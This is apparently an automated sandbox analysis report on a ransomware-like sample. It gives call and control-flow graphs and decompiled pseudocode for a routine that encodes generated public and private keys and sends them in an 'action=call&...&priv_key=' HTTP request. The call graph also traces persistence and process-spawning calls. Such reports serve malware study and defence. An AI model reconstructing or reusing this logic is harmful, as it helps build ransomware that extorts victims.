2094->1983 2094->1994 2095->2094 2096->2093 2098 f58802d InternetOpenW 2097->2098 2099 f587002 VirtualAlloc lstrlenW 2097->2099 2098->2099 2100 f588050 2099->2100 2101 f588069 2100->2101 2102 f588062 InternetCloseHandle 2100->2102 2103 f587e40 2 API calls 2101->2103 2102->2101 2104 f588070 InternetConnectW 2103->2104 2105 f588098 2104->2105 2106 f5880a1 VirtualAlloc wsprintfW HttpOpenRequestW 2104->2106 2105->2091 2107 f5880f1 HttpAddRequestHeadersW 2106->2107 2108 f5881c2 InternetCloseHandle InternetCloseHandle VirtualFree 2106->2108 2107->2108 2109 f588158 HttpSendRequestW 2107->2109 2108->2091 2110 f5881bc GetLastError 2109->2110 2111 f58816f InternetReadFile 2109->2111 2110->2108 2111->2108 2112 f58818e 2111->2112 2112->2108 2113 f588197 InternetReadFile 2112->2113 2113->2112 2114 f5881ba 2113->2114 2114->2108 2115->1826 2117 f586438 CryptGenKey 2116->2117 2118 f586402 GetLastError 2116->2118 2120 f586454 2117->2120 2121 f586455 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 2117->2121 2119 f58640f CryptAcquireContextW 2118->2119 2122 f586428 2118->2122 2119->2122 2123 f58642f 2119->2123 2120->2121 2121->2122 2122->1765 2123->2117 2124->1847 2126 f5835f1 2125->2126 2127 f5835f7 GetModuleFileNameW CreateFileW 2125->2127 2126->1871 2128 f58369a VirtualFree 2127->2128 2129 f583623 GetFileSize VirtualAlloc 2127->2129 2128->1871 2130 f583641 ReadFile 2129->2130 2131 f583693 CloseHandle 2129->2131 2132 f583685 VirtualFree 2130->2132 2133 f583656 2130->2133 2131->2128 2132->2131 2133->2132 2134 f583667 2133->2134 2160 f5834f0 lstrlenA VirtualAlloc 2134->2160 2138 f585c40 CryptBinaryToStringA 2137->2138 2139 f585f33 GetModuleHandleA 2137->2139 2138->1882 2138->1883 2140 f585f42 GetProcAddress lstrlenA 2139->2140 2141 f585f76 _memset 2139->2141 2143 f585f65 wsprintfA 2140->2143 2142 f585f90 lstrlenA 2141->2142 2144 f585fa8 2142->2144 2143->2141 2145 f585fb8 VirtualFree 2144->2145 2145->2138 2147 f587e40 2 API calls 2146->2147 2148 f585509 2147->2148 2167 f585220 VirtualAlloc 2148->2167 2151 f58554d lstrcatA lstrlenA lstrlenW lstrlenA 2153 f588050 15 API calls 2151->2153 2154 f5855f4 2153->2154 2155 f585629 VirtualFree VirtualFree VirtualFree 2154->2155 2176 f5853d0 lstrlenA VirtualAlloc 2154->2176 2156 f58565d 2155->2156 2157 f585656 InternetCloseHandle 2155->2157 2156->1891 2156->1892 2157->2156 2159 f585615 2159->2155 2161 f583528 CryptStringToBinaryA 2160->2161 2162 f5835af 2160->2162 2163 f58353f VirtualAlloc VirtualAlloc 2161->2163 2164 f5835a1 VirtualFree 2161->2164 2162->2132 2165 f58356f 2163->2165 2166 f583576 wsprintfW wsprintfW 2163->2166 2164->2162 2165->2166 2166->2164 2168 f58529b 2167->2168 2169 f585341 lstrlenA VirtualAlloc VirtualAlloc 2167->2169 2170 f5852cb lstrlenW VirtualAlloc 2168->2170 2171 f5852c0 Sleep 2168->2171 2169->2151 2210 f585060 CreatePipe 2170->2210 2171->2170 2173 f5852f6 lstrcmpiA 2174 f585309 VirtualFree 2173->2174 2175 f58531e wsprintfW VirtualFree 2173->2175 2174->2168 2175->2169 2177 f585403 CryptStringToBinaryA 2176->2177 2179 f585429 2177->2179 2180 f5854dc GetLastError 2177->2180 2181 f585f00 7 API calls 2179->2181 2182 f5854c3 VirtualFree 2180->2182 2183 f585433 2181->2183 2182->2159 2241 f5833e0 2183->2241 2186 f58544d 2189 f585498 2186->2189 2190 f58546f lstrlenA VirtualAlloc 2186->2190 2187 f5854e4 2251 f585350 VirtualAlloc VirtualAlloc 2187->2251 2193 f5854b4 2189->2193 2196 f5854ac HeapFree 2189->2196 2190->2189 2192 f585490 lstrcpyA 2190->2192 2192->2189 2194 f5854c0 2193->2194 2198 f5854bd HeapFree 2193->2198 2194->2182 2196->2193 2198->2194 2211 f585179 SetHandleInformation 2210->2211 2212 f58516f 2210->2212 2211->2212 2213 f58518f CreatePipe SetHandleInformation 2211->2213 2212->2173 2213->2212 2214 f5851b5 VirtualAlloc 2213->2214 2215 f5851cf wsprintfW 2214->2215 2216 f585204 lstrcpyA 2214->2216 2221 f584e10 2215->2221 2216->2173 2218 f5851e4 2226 f584fb0 2218->2226 2232 f589170 2221->2232 2224 f584e79 GetLastError 2224->2218 2225 f584e84 CloseHandle CloseHandle 2225->2218 2231 f584fbd 2226->2231 2227 f584fc6 ReadFile 2228 f585035 2227->2228 2227->2231 2229 f585053 VirtualFree 2228->2229 2234 f584ea0 2228->2234 2229->2173 2231->2227 2231->2228 2233 f584e2e CreateProcessW 2232->2233 2233->2224 2233->2225 2237 f584ecb 2234->2237 2235 f584f05 lstrcpyA 2235->2229 2236 f584f63 lstrlenA 2239 f584f70 lstrcpyA 2236->2239 2237->2235 2237->2236 2238 f584f5d 2237->2238 2238->2235 2239->2229 2255 f5832b0 lstrlenA 2241->2255 2244 f5834d9 ExitProcess 2246 f583412 2246->2186 2246->2187 2247 f583407 2247->2246 2249 f583483 lstrlenA GetProcessHeap HeapAlloc 2247->2249 2259 f583190 2247->2259 2263 f583200 2247->2263 2249->2247 2250 f5834a5 lstrcpyA 2249->2250 2250->2247 2252 f5853b9 ExitProcess 2251->2252 2253 f585380 GetModuleFileNameW 2251->2253 2253->2252 2254 f585392 wsprintfW ShellExecuteW 2253->2254 2254->2252 2256 f5832f8 2255->2256 2257 f5832cf 2255->2257 2256->2244 2256->2247 2258 f5832d0 lstrlenA 2257->2258 2258->2256 2258->2258 2260 f5831b0 lstrcmpiA lstrcmpiA 2259->2260 2262 f58319e 2259->2262 2260->2247 2261 f5831f1 2261->2247 2262->2260 2262->2261 2265 f583210 2263->2265 2264 f58323d 2264->2247 2265->2264 2266 f58326d 2265->2266 2267 f583250 lstrlenA GetProcessHeap HeapAlloc 2265->2267 2269 f583299 2266->2269 2270 f583272 lstrlenA GetProcessHeap HeapAlloc 2266->2270 2268 f58328d 2267->2268 2268->2269 2271 f583291 lstrcpyA 2268->2271 2269->2247 2270->2268 2271->2269 2273 f589170 _memset 2272->2273 2274 f583d47 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2273->2274 2274->1898 2275->1915 2277 f58569f wsprintfW 2276->2277 2304 f583bc0 GetProcessHeap 2277->2304 2280 f5856f1 2281 f587490 96 API calls 2280->2281 2282 f5856fc 2281->2282 2283 f5872a0 16 API calls 2282->2283 2284 f585707 lstrlenW 2283->2284 2285 f5870a0 49 API calls 2284->2285 2286 f58571d lstrlenW 2285->2286 2287 f58573f lstrlenW VirtualAlloc 2286->2287 2288 f585731 VirtualFree 2286->2288 2289 f585762 wsprintfA 2287->2289 2290 f585776 2287->2290 2288->2287 2289->2290 2291 f585f00 7 API calls 2290->2291 2292 f585785 CryptBinaryToStringA 2291->2292 2293 f5857a8 GetLastError 2292->2293 2294 f5857ae lstrlenA VirtualAlloc lstrlenA 2292->2294 2293->2294 2295 f5857da lstrlenA 2294->2295 2297 f58580e 2295->2297 2302 f5857f1 lstrlenA 2295->2302 2298 f5854f0 100 API calls 2297->2298 2299 f58581b VirtualFree 2298->2299 2301 f587d70 10 API calls 2299->2301 2303 f58584a VirtualFree 2301->2303 2302->2297 2303->1923 2304->2280 2326 f582f50 K32EnumDeviceDrivers 2305->2326 2307 f582d8c 2308 f582de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2307->2308 2311 f582f50 6 API calls 2307->2311 2309 f582e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2308->2309 2310 f582e75 ExitThread 2308->2310 2312 f582ebe ExitThread 2309->2312 2313 f582ec5 ShowWindow UpdateWindow CreateThread 2309->2313 2314 f582d99 2311->2314 2315 f582eed CloseHandle 2313->2315 2316 f582ef4 GetMessageW 2313->2316 2314->2308 2319 f582f50 6 API calls 2314->2319 2315->2316 2317 f582f0b 2316->2317 2318 f582f3d ExitThread 2316->2318 2320 f582f17 TranslateMessage DispatchMessageW 2317->2320 2321 f582dce 2319->2321 2320->2318 2322 f582f2c GetMessageW 2320->2322 2321->2318 2335 f5830a0 2321->2335 2322->2318 2322->2320 2327 f582f7d 2326->2327 2328 f582f82 VirtualAlloc 2326->2328 2327->2307 2329 f582f99 2328->2329 2330 f582f9f K32EnumDeviceDrivers 2328->2330 2329->2307 2331 f582ff2 VirtualFree 2330->2331 2333 f582fae 2330->2333 2331->2307 2332 f582fc0 K32GetDeviceDriverBaseNameW 2332->2333 2333->2331 2333->2332 2334 f583009 VirtualFree 2333->2334 2334->2307 2336 f582f50 6 API calls 2335->2336 2337 f583151 2336->2337 2338 f582f50 6 API calls 2337->2338 2343 f582ddb 2337->2343 2339 f583160 2338->2339 2340 f582f50 6 API calls 2339->2340 2339->2343 2341 f58316c 2340->2341 2342 f582f50 6 API calls 2341->2342 2341->2343 2342->2343 2343->2318 2344 f582ad0 VirtualAlloc 2343->2344 2345 f582b02 GetModuleFileNameW GetTempPathW 2344->2345 2347 f582b48 2345->2347 2348 f582b4c 2347->2348 2349 f582b53 lstrlenW 2347->2349 2372 f582960 lstrlenW 2348->2372 2360 f5882b0 CryptAcquireContextW 2349->2360 2351 f582b8e GetEnvironmentVariableW 2353 f582bac 2351->2353 2355 f582bd8 lstrcatW lstrcatW lstrcatW 2353->2355 2357 f582bb0 2353->2357 2354 f582c45 ExitThread 2377 f582890 CreateFileW 2355->2377 2358 f582c2f wsprintfW 2357->2358 2358->2348 2359 f582c02 2359->2354 2359->2358 2361 f5883c9 2360->2361 2362 f5882db VirtualAlloc 2360->2362 2361->2351 2364 f58830b 2362->2364 2365 f5883d2 CryptReleaseContext VirtualFree 2362->2365 2364->2365 2366 f588313 GetModuleHandleA 2364->2366 2365->2351 2367 f588359 LoadLibraryA 2366->2367 2368 f588367 GetProcAddress 2366->2368 2367->2368 2369 f5883ae 2367->2369 2368->2369 2371 f588376 2368->2371 2370 f5883b0 CryptReleaseContext VirtualFree 2369->2370 2370->2361 2371->2369 2371->2370 2371->2371 2373 f5882b0 9 API calls 2372->2373 2374 f5829ad RegCreateKeyExW 2373->2374 2375 f582a8e lstrlenW RegSetValueExW RegCloseKey 2374->2375 2376 f582ac0 2374->2376 2375->2354 2376->2354 2378 f5828b8 GetFileSize 2377->2378 2379 f5828f9 2377->2379 2394 f583030 2378->2394 2379->2359 2382 f583030 6 API calls 2383 f5828d5 CreateFileMappingW 2382->2383 2384 f582902 MapViewOfFile 2383->2384 2385 f5828f2 CloseHandle 2383->2385 2386 f582948 CloseHandle CloseHandle 2384->2386 2387 f582916 2384->2387 2385->2379 2386->2359 2388 f583030 6 API calls 2387->2388 2389 f58291b 2388->2389 2392 f58292b 2389->2392 2399 f588400 CryptAcquireContextW 2389->2399 2410 f582830 CreateFileW 2392->2410 2395 f582f50 6 API calls 2394->2395 2396 f58307f 2395->2396 2397 f582f50 6 API calls 2396->2397 2398 f5828c8 2396->2398 2397->2398 2398->2382 2400 f58842e VirtualAlloc 2399->2400 2401 f5884f2 2399->2401 2403 f588458 2400->2403 2404 f5884fb CryptReleaseContext VirtualFree 2400->2404 2401->2392 2403->2404 2405 f588461 GetModuleHandleA 2403->2405 2404->2392 2406 f5884b5 GetProcAddress 2405->2406 2407 f5884a7 LoadLibraryA 2405->2407 2408 f5884d9 CryptReleaseContext VirtualFree 2406->2408 2409 f5884c4 2406->2409 2407->2406 2407->2408 2408->2401 2409->2408 2411 f58285b 2410->2411 2412 f58287f UnmapViewOfFile 2410->2412 2413 f58285f WriteFile 2411->2413 2414 f582873 2411->2414 2412->2386 2413->2414 2415 f582878 CloseHandle 2413->2415 2414->2415 2415->2412 2424 f582c50 2425 f582cda CreateThread DestroyWindow 2424->2425 2426 f582c7b 2424->2426 2427 f582c80 DefWindowProcW 2426->2427 2428 f582c97 BeginPaint lstrlenW TextOutW EndPaint 2426->2428 2429 f582d10 SendMessageW ExitThread 2430 f585ff0 2431 f586012 2430->2431 2432 f58603e GetPEB 2431->2432 2433 f586058 2432->2433 2568 f586f40 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2569 f586df0 111 API calls 2568->2569 2570 f586fd0 VirtualFree ExitThread 2569->2570 2571 f589200 IsProcessorFeaturePresent 2572 f589226 2571->2572 2573 f584dc0 2574 f584dd9 2573->2574 2575 f584ddd CreateThread 2573->2575 2575->2574 2576 f584dfb CloseHandle 2575->2576 2576->2574 2577 f584da5 2580 f586620 VirtualFree VirtualFree 2577->2580 2579 f584db4 2580->2579 2581 f5843a6 2589 f5843b0 2581->2589 2582 f584456 2583 f584578 VirtualFree 2582->2583 2584 f584547 VirtualAlloc 2582->2584 2587 f587d70 10 API calls 2583->2587 2584->2583 2586 f584564 wsprintfW 2584->2586 2585 f5843e0 lstrcpyW lstrlenW 2585->2582 2585->2589 2586->2583 2588 f584598 2587->2588 2589->2582 2589->2585

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_0F585350 1 Function_0F588050 9 Function_0F587E40 1->9 2 Function_0F586550 77 Function_0F5863E0 2->77 3 Function_0F582F50 4 Function_0F582C50 5 Function_0F588F54 6 Function_0F589049 7 Function_0F586F40 71 Function_0F586DF0 7->71 8 Function_0F586B40 10 Function_0F586D40 11 Function_0F584A78 12 Function_0F58377E 48 Function_0F581020 12->48 13 Function_0F587D70 14 Function_0F585E70 15 Function_0F587B70 16 Function_0F583C70 17 Function_0F589170 18 Function_0F585670 18->13 30 Function_0F585F00 18->30 59 Function_0F583BC0 18->59 65 Function_0F5854F0 18->65 79 Function_0F587490 18->79 94 Function_0F5870A0 18->94 95 Function_0F5872A0 18->95 19 Function_0F588D71 20 Function_0F586E69 20->71 87 Function_0F586AB0 20->87 21 Function_0F586660 57 Function_0F5836C0 21->57 22 Function_0F585860 22->13 22->30 22->59 62 Function_0F5835C0 22->62 22->65 22->79 22->94 22->95 23 Function_0F582960 89 Function_0F5882B0 23->89 24 Function_0F587B60 25 Function_0F585060 28 Function_0F584E10 25->28 86 Function_0F584FB0 25->86 26 Function_0F588260 27 Function_0F582D10 28->17 29 Function_0F587410 30->14 30->17 60 Function_0F585DC0 30->60 31 Function_0F588400 32 Function_0F584200 33 Function_0F584B00 34 Function_0F583200 35 Function_0F589200 36 Function_0F586500 37 Function_0F583030 37->3 38 Function_0F582D30 38->3 54 Function_0F582AD0 38->54 96 Function_0F5830A0 38->96 39 Function_0F582830 40 Function_0F588F2C 41 Function_0F586620 42 Function_0F584B20 42->2 42->16 42->22 42->32 42->33 42->36 42->38 50 Function_0F5841D0 42->50 52 Function_0F5847D0 42->52 58 Function_0F5864C0 42->58 61 Function_0F5848C0 42->61 73 Function_0F583FF0 42->73 83 Function_0F5842B0 42->83 91 Function_0F5845B0 42->91 92 Function_0F583DB0 42->92 43 Function_0F588B20 44 Function_0F585220 44->25 45 Function_0F588520 46 Function_0F583320 47 Function_0F581C20 49 Function_0F589124 50->41 50->73 78 Function_0F5865E0 50->78 51 Function_0F5853D0 51->0 51->1 51->9 51->30 51->44 51->51 76 Function_0F5833E0 51->76 52->13 52->59 52->79 52->94 52->95 53 Function_0F5836D0 53->48 54->23 74 Function_0F5881F0 54->74 80 Function_0F582890 54->80 54->89 55 Function_0F588DCC 56 Function_0F588ECE 60->17 68 Function_0F5834F0 62->68 63 Function_0F584DC0 64 Function_0F588EFE 65->1 65->9 65->44 65->51 66 Function_0F588AF0 67 Function_0F583CF0 67->17 69 Function_0F585FF0 75 Function_0F585FE0 69->75 70 Function_0F586FF0 70->1 70->9 71->10 71->71 82 Function_0F586780 71->82 71->87 98 Function_0F586BA0 71->98 72 Function_0F5868F0 73->18 76->34 76->46 81 Function_0F583190 76->81 85 Function_0F5832B0 76->85 79->15 79->29 79->70 90 Function_0F588AB0 79->90 80->31 80->37 80->39 82->74 83->13 83->59 83->74 83->79 83->94 83->95 84 Function_0F5837B0 84->21 84->31 84->36 84->43 84->45 84->53 86->66 97 Function_0F584EA0 86->97 87->72 87->84 88 Function_0F5869B0 87->88 91->67 92->16 92->67 93 Function_0F588DA8 96->3 98->8 98->26 99 Function_0F588FA4 100 Function_0F584DA5 100->41 101 Function_0F5843A6 101->13 101->74

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 92 f585860-f5858ec call f583bc0 call f587490 call f5872a0 VirtualAlloc 99 f5858ee-f5858f0 92->99 100 f585901-f585905 92->100 99->100 101 f5858f2-f5858ff 99->101 102 f585907-f585916 100->102 101->102 103 f585918-f58591d 102->103 104 f58592f-f585931 102->104 103->104 105 f58591f-f58592d 103->105 106 f585935-f58593e 104->106 105->106 107 f58594d-f58594f 106->107 108 f585940-f58594b 106->108 109 f585953-f58595b 107->109 108->107 108->109 110 f585d98-f585db9 VirtualFree call f587d70 109->110 111 f585961-f5859de CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 109->111 113 f5859e0-f5859e2 111->113 114 f5859f5 111->114 113->114 116 f5859e4-f5859f3 113->116 117 f5859fd-f585a06 lstrlenA 114->117 116->117 118 f585a08-f585a0e 117->118 119 f585a10 117->119 118->119 120 f585a18-f585a22 lstrlenA 118->120 119->120 121 f585a4e-f585a55 lstrlenA 120->121 122 f585a24-f585a28 120->122 124 f585a7e-f585ac7 lstrcatW lstrlenW call f5870a0 call f5835c0 121->124 125 f585a57-f585a5f 121->125 123 f585a30-f585a39 122->123 127 f585a3b-f585a3d 123->127 128 f585a42-f585a48 lstrlenA 123->128 138 f585ac9-f585aca ExitProcess 124->138 139 f585ad0-f585bc9 lstrcatW * 4 VirtualFree * 2 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 124->139 129 f585a60-f585a65 125->129 127->128 131 f585a3f-f585a41 127->131 128->123 132 f585a4a 128->132 133 f585a72-f585a7c lstrlenA 129->133 134 f585a67-f585a69 129->134 131->128 132->121 133->124 133->129 134->133 136 f585a6b-f585a6e 134->136 136->133 140 f585bcb-f585bcd 139->140 141 f585bd3 139->141 140->141 142 f585bcf-f585bd1 140->142 143 f585bd5-f585be7 lstrlenW 141->143 142->143 144 f585be9-f585bf1 VirtualFree 143->144 145 f585bf7-f585c18 lstrlenW VirtualAlloc 143->145 144->145 146 f585c1a-f585c2b wsprintfA 145->146 147 f585c2e-f585c67 call f585f00 CryptBinaryToStringA 145->147 146->147 150 f585c69 GetLastError 147->150 151 f585c6f-f585c95 lstrlenA VirtualAlloc lstrlenA 147->151 150->151 152 f585c9f 151->152 153 f585c97-f585c9d 151->153 154 f585ca7-f585cae lstrlenA 152->154 153->152 153->154 155 f585cb0-f585cb4 154->155 156 f585cd6-f585d0d lstrlenA MultiByteToWideChar call f5854f0 154->156 157 f585cb8-f585cbd 155->157 163 f585d5c-f585d62 156->163 164 f585d0f-f585d5b VirtualFree * 4 call f587d70 156->164 159 f585cca-f585cd4 lstrlenA 157->159 160 f585cbf-f585cc1 157->160 159->156 159->157 160->159 162 f585cc3-f585cc6 160->162 162->159 165 f585d69-f585d96 VirtualFree * 3 163->165 166 f585d64-f585d67 163->166 165->110 166->165
                                    C-Code - Quality: 82%
                                    			E0F585860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
                                    				char _v148;
                                    				char _v152;
                                    				void* _v156;
                                    				int _v160;
                                    				int _v164;
                                    				CHAR* _v172;
                                    				int _v176;
                                    				CHAR* _v184;
                                    				int _v192;
                                    				void* _v196;
                                    				CHAR* _v200;
                                    				CHAR* _v204;
                                    				WCHAR* _v208;
                                    				void* _v212;
                                    				void* _v216;
                                    				signed int _v220;
                                    				short* _v224;
                                    				void* _v228;
                                    				void* _v232;
                                    				void* _v236;
                                    				CHAR* _v240;
                                    				CHAR* _v268;
                                    				void* __esi;
                                    				CHAR* _t134;
                                    				void* _t136;
                                    				int _t146;
                                    				void* _t149;
                                    				int _t150;
                                    				signed int _t151;
                                    				void* _t153;
                                    				int _t159;
                                    				signed int _t167;
                                    				signed int _t171;
                                    				CHAR* _t178;
                                    				int _t179;
                                    				CHAR* _t182;
                                    				void* _t191;
                                    				long _t195;
                                    				void _t210;
                                    				int _t211;
                                    				intOrPtr _t215;
                                    				int _t216;
                                    				char _t217;
                                    				long _t226;
                                    				int _t239;
                                    				char* _t240;
                                    				void* _t244;
                                    				void* _t245;
                                    				void* _t248;
                                    				long _t250;
                                    				signed int _t254;
                                    				CHAR* _t256;
                                    				int _t259;
                                    				int _t260;
                                    				void* _t261;
                                    				void* _t266;
                                    				CHAR* _t267;
                                    				void* _t270;
                                    				CHAR* _t273;
                                    				long _t276;
                                    				CHAR* _t277;
                                    				char* _t279;
                                    				signed int _t282;
                                    				int _t283;
                                    				long _t286;
                                    				void* _t287;
                                    				void* _t288;
                                    				WCHAR* _t289;
                                    				WCHAR* _t290;
                                    				void* _t291;
                                    				WCHAR* _t292;
                                    				WCHAR* _t294;
                                    				int _t297;
                                    				long _t298;
                                    				void* _t299;
                                    				CHAR* _t300;
                                    				int _t302;
                                    				signed int _t303;
                                    				void* _t307;
                                    
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_v184 = __ecx;
                                    				_v160 = __edx;
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				_t307 = (_t303 & 0xfffffff8) - 0x9c;
                                    				_push(1);
                                    				_push(__ecx);
                                    				_push(1);
                                    				E0F583BC0( &_v148);
                                    				E0F587490( &_v236, __edx); // executed
                                    				_t266 = E0F5872A0( &_v236);
                                    				_t282 = _a8 + __edx;
                                    				_t7 = _t282 + 8; // 0x8
                                    				_t226 = _t266 + _t7 * 8 << 3;
                                    				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
                                    				_t259 = 0;
                                    				_v240 = _t134;
                                    				_v268 = _t134;
                                    				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
                                    				if(_t134 == 0 || _t239 >= _t226) {
                                    					_v176 = _t259;
                                    					_t267 = _t134;
                                    				} else {
                                    					_t267 = _t239 + _t134;
                                    					_v176 = _t134;
                                    					_v184 = _t267;
                                    					_t259 = _t239;
                                    				}
                                    				_t136 = 2 + _a8 * 8;
                                    				if(_v156 == 0) {
                                    					L7:
                                    					_t240 = 0;
                                    					_v172 = 0;
                                    				} else {
                                    					_t302 = _t259 + _t136;
                                    					if(_t302 >= _t226) {
                                    						goto L7;
                                    					} else {
                                    						_t240 = _t267;
                                    						_v172 = _t267;
                                    						_t267 =  &(_t267[_t136]);
                                    						_t259 = _t302;
                                    						_v184 = _t267;
                                    					}
                                    				}
                                    				_t283 = _v164;
                                    				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
                                    					_t267 = 0;
                                    					_v184 = 0;
                                    				}
                                    				if(_t240 == 0) {
                                    					L58:
                                    					VirtualFree(_v156, 0, 0x8000);
                                    					E0F587D70( &_v152);
                                    					return 1;
                                    				} else {
                                    					_t260 = _a8;
                                    					_v160 = _t260 + _t260;
                                    					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
                                    					_v176 = _t283 + _t283;
                                    					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
                                    					_t146 = lstrlenA(_t267);
                                    					_t286 = _t146 + lstrlenA(_v204) + 0x42;
                                    					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
                                    					_v196 = _t149;
                                    					_v200 = _t149;
                                    					_v220 = 0;
                                    					_t150 = lstrlenA(_v204);
                                    					_t261 = _v196;
                                    					_t151 = _t150 + 1;
                                    					if(_t261 == 0 || _t151 >= _t286) {
                                    						_v212 = 0;
                                    					} else {
                                    						_v220 = _t151;
                                    						_v200 = _t261 + _t151;
                                    						_v212 = _t261;
                                    					}
                                    					_t153 = lstrlenA(_t267) + 1;
                                    					if(_v196 == 0 || _t153 + _v220 >= _t286) {
                                    						_v200 = 0;
                                    					}
                                    					_t287 = 0;
                                    					if(lstrlenA(_v204) != 0) {
                                    						_t279 = _v212;
                                    						do {
                                    							_t256 = _v204;
                                    							_t217 =  *((intOrPtr*)(_t287 + _t256));
                                    							if(_t217 != 0xa && _t217 != 0xd) {
                                    								 *_t279 = _t217;
                                    								_t279 = _t279 + 1;
                                    							}
                                    							_t287 = _t287 + 1;
                                    						} while (_t287 < lstrlenA(_t256));
                                    						_t267 = _v216;
                                    					}
                                    					_t288 = 0;
                                    					if(lstrlenA(_t267) != 0) {
                                    						_t254 = _v200;
                                    						_v220 = _t254;
                                    						do {
                                    							_t215 =  *((intOrPtr*)(_t288 + _t267));
                                    							if(_t215 != 0xa && _t215 != 0xd) {
                                    								 *_t254 = _t215;
                                    								_v220 = _t254 + 1;
                                    							}
                                    							_t288 = _t288 + 1;
                                    							_t216 = lstrlenA(_t267);
                                    							_t254 = _v220;
                                    						} while (_t288 < _t216);
                                    					}
                                    					_t289 = _v208;
                                    					lstrcatW(_t289, L"action=call&");
                                    					_t290 =  &(_t289[lstrlenW(_t289)]);
                                    					_v216 = _t290;
                                    					E0F5870A0( &_v184, _t290); // executed
                                    					_v224 = 0;
                                    					_v208 = 0;
                                    					_t159 = E0F5835C0( &_v224,  &_v208); // executed
                                    					if(_t159 == 0) {
                                    						ExitProcess(_t159); // executed
                                    					}
                                    					lstrcatW(_t290, L"&id=");
                                    					_t270 = _v220;
                                    					lstrcatW(_t290, _t270);
                                    					lstrcatW(_t290, L"&subid=");
                                    					_t291 = _v204;
                                    					lstrcatW(_v216, _t291);
                                    					VirtualFree(_t270, 0, 0x8000);
                                    					VirtualFree(_t291, 0, 0x8000);
                                    					_t292 = _v216;
                                    					lstrcatW(_t292, L"&pub_key=");
                                    					_t167 = lstrlenW(_t292);
                                    					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
                                    					_t294 = _v216;
                                    					lstrcatW(_t294, L"&priv_key=");
                                    					_t171 = lstrlenW(_t294);
                                    					_t273 = _v200;
                                    					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
                                    					lstrcatW(_v216, L"&version=2.3.1r");
                                    					_t276 = (lstrlenW(_v208) << 4) + 0x12;
                                    					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
                                    					_t244 = 2 + lstrlenW(_v208) * 8;
                                    					_t178 = _v216;
                                    					if(_t178 == 0 || _t244 >= _t276) {
                                    						_t277 = 0;
                                    					} else {
                                    						_t277 = _t178;
                                    					}
                                    					_t179 = lstrlenW(_v208);
                                    					_t245 =  *0xf592a78; // 0x0
                                    					_v220 = _t179;
                                    					if(_t245 != 0) {
                                    						VirtualFree(_t245, 0, 0x8000);
                                    					}
                                    					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
                                    					 *0xf592a78 = _t182;
                                    					if(_t182 != 0) {
                                    						wsprintfA(_t182, "%S", L"popkadurak");
                                    						_t307 = _t307 + 0xc;
                                    					}
                                    					_t297 = _v220 + _v220;
                                    					E0F585F00(_v208, _t297, _t297);
                                    					_v192 = _v220 * 8;
                                    					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
                                    						GetLastError();
                                    					}
                                    					_t104 = lstrlenA(_t277) + 2; // 0x2
                                    					_t298 = _t104;
                                    					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
                                    					_t106 = lstrlenA(_t277) + 1; // 0x1
                                    					_t248 = _t106;
                                    					_t191 = _v228;
                                    					if(_t191 == 0) {
                                    						L46:
                                    						_v216 = 0;
                                    					} else {
                                    						_v216 = _t191;
                                    						if(_t248 >= _t298) {
                                    							goto L46;
                                    						}
                                    					}
                                    					_t299 = 0;
                                    					if(lstrlenA(_t277) != 0) {
                                    						_v236 = _v216;
                                    						do {
                                    							_t210 =  *((intOrPtr*)(_t299 + _t277));
                                    							if(_t210 != 0xa && _t210 != 0xd) {
                                    								 *_t248 = _t210;
                                    								_v236 = _t248 + 1;
                                    							}
                                    							_t299 = _t299 + 1;
                                    							_t211 = lstrlenA(_t277);
                                    							_t248 = _v236;
                                    						} while (_t299 < _t211);
                                    					}
                                    					_t300 = _v216;
                                    					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
                                    					_v236 = 0;
                                    					_t195 = E0F5854F0(_t300,  &_v236, _t248, 1);
                                    					if(_t195 != 0) {
                                    						_t250 = _v236;
                                    						if(_t250 != 0) {
                                    							 *_a12 = _t250;
                                    						}
                                    						VirtualFree(_v228, 0, 0x8000);
                                    						VirtualFree(_v232, 0, 0x8000);
                                    						VirtualFree(_v212, 0, 0x8000);
                                    						goto L58;
                                    					} else {
                                    						VirtualFree(_v228, _t195, 0x8000);
                                    						VirtualFree(_v232, 0, 0x8000);
                                    						VirtualFree(_v212, 0, 0x8000);
                                    						VirtualFree(_v204, 0, 0x8000);
                                    						E0F587D70( &_v200);
                                    						return 0;
                                    					}
                                    				}
                                    			}


















































































                                    0x0f58586f
                                    0x0f585870
                                    0x0f585872
                                    0x0f585873
                                    0x0f585878
                                    0x0f58587e
                                    0x0f585882
                                    0x0f585884
                                    0x0f585885
                                    0x0f585887
                                    0x0f585888
                                    0x0f58588a
                                    0x0f58588b
